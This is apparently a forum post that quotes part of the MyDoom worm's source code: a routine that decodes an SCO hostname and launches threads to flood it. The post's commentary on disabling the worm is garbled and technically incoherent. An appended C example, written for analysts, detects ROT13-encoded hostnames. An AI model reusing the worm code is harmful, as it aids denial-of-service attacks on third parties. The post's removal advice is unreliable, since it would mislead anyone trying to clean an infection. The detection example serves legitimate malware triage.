This is a small excerpt of the "My else Doom" source code:

void scodos_main(void)
{
    struct hostent *h;
    struct sockaddr_in addr;
    int i;
    unsigned long tid;
    char buf[128];

    rot13(buf, SCO_SITE_ROT13);

    for (;;) {
        while (is_online() == 0)
            Sleep(32768);

        h = gethostbyname(buf);
        if (h == NULL) {
            Sleep(32768);
            continue;
        }
        memset(&addr, '\0', sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_addr = *(struct in_addr *)h->h_addr_list[0];
        addr.sin_port = htons(SCO_PORT);
        break;
    }

    for (i=1; i<SCODOS_THREADS; i++)
        CreateThread(0, 0, scodos_th, (LPVOID)&addr, 0, &tid);
    scodos_th(&addr);
}


That piece:

    while (is_online() == 0)
        Sleep(32768);

The is_online() function does not really check for a "connection"; it assumes the "victim" is connected, for two reasons:

1.- The is_online() prototype takes an if(THREAD_STATUS) check for internet appz!!!

2.- The int value requested is always <> 0, which results in permanent virus activity.


Now

    addr.sin_addr = *(struct in_addr *)h->h_addr_list[0];

can be fixed manually: put a simple C code reserved offset interval. The virus is inactive.


Another resource may be tracking port 80 or changing the TCP/UDP transfer limit (the virus is not affected by this action).

In one week I will publish my investigation of W32 virus ways:

http://xr.homeunix.net/forum.html


Best Wishes


Az
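
Added example, not part of the original post or of the worm's code: the excerpt decodes its target hostname with rot13(buf, SCO_SITE_ROT13), so an analyst triaging a sample can ROT13-decode every string run in it and report the ones that turn into hostnames. The sample buffer, the placeholder host www.example.com, the short TLD list and the function names are assumptions made for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: header bytes, two plaintext strings, one ROT13 placeholder host. */
static const unsigned char SAMPLE[] =
    "\x4d\x5a\x90\x00kernel32.dll\x00www.example.net\x00jjj.rknzcyr.pbz\x00\x01";

static char rot13_char(char c)
{
    if (c >= 'a' && c <= 'z') return (char)('a' + (c - 'a' + 13) % 26);
    if (c >= 'A' && c <= 'Z') return (char)('A' + (c - 'A' + 13) % 26);
    return c;                       /* digits, '.', '-' pass through */
}

/* A decoded run is a hit only if it ends in a common TLD (assumed list);
 * ordinary plaintext strings decode to gibberish and are not reported. */
static int ends_in_known_tld(const char *s, size_t n)
{
    static const char *tlds[] = { ".com", ".net", ".org" };
    for (size_t i = 0; i < sizeof tlds / sizeof tlds[0]; i++)
        if (n > 4 && strcmp(s + n - 4, tlds[i]) == 0) return 1;
    return 0;
}

/* Walk runs of hostname characters, ROT13-decode each, copy the first hit to out. */
int find_rot13_hostname(const unsigned char *buf, size_t len, char *out, size_t outsz)
{
    size_t start = 0, i, j, n;
    for (i = 0; i <= len; i++) {
        if (i < len && (isalnum(buf[i]) || buf[i] == '.' || buf[i] == '-'))
            continue;               /* still inside a candidate run */
        n = i - start;
        if (n >= 6 && n < outsz) {
            for (j = 0; j < n; j++) out[j] = rot13_char((char)buf[start + j]);
            out[n] = '\0';
            if (ends_in_known_tld(out, n)) return 1;
        }
        start = i + 1;
    }
    if (outsz) out[0] = '\0';
    return 0;
}

int main(void)
{
    char host[128];
    if (find_rot13_hostname(SAMPLE, sizeof SAMPLE - 1, host, sizeof host))
        printf("ROT13-encoded hostname candidate: %s\n", host);
    return 0;
}
```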